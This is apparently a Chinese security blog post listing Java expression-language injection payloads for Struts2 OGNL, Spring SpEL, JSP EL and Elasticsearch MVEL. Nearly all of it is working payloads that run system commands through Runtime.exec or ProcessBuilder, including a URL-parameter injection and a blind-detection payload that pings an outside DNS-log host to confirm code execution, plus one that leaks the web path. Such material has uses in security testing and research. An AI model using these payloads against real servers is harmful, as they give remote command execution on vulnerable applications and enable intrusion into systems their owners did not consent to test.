年轻人不要总熬夜

java 表达式注入

Posted on Mar 02, 2017 By jax777

Java-Web-Expression-Language-Injection

表达式语言

Struts2——OGNL

用法

java
ActionContext AC = ActionContext.getContext();
Map Parameters = (Map)AC.getParameters();
String expression = "${(new java.lang.ProcessBuilder('calc')).start()}";
AC.getValueStack().findValue(expression));

Spring——SPEL 表达式

用法

基本用法

java
String expression = "T(java.lang.Runtime).getRuntime().exec(/"calc/")";
String result = parser.parseExpression(expression).getValue().toString();

cloudeye

${pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(""ping 776252.dnslog.info"",null).toString()}  

 ${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("ping 776252.dnslog.info",null).getInputStream())}

http://localhost:8080/test.do?${pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc",null).toString()}

JSP——JSTL_EL

jsp
<spring:message text="${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}"></spring:message>

测试payload ` ${1000-900} ` cloudeye


${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("ping 776252.dnslog.info",null).getInputStream())}

获取web路径

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

Elasticsearch——MVEL

用法

java import org.mvel.MVEL;
public class MVELTest {
        public static void main(String[] args) {
              String expression = "new java.lang.ProcessBuilder(/"calc/").start();";
               Boolean result = (Boolean) MVEL.eval(expression, vars);
         }
  }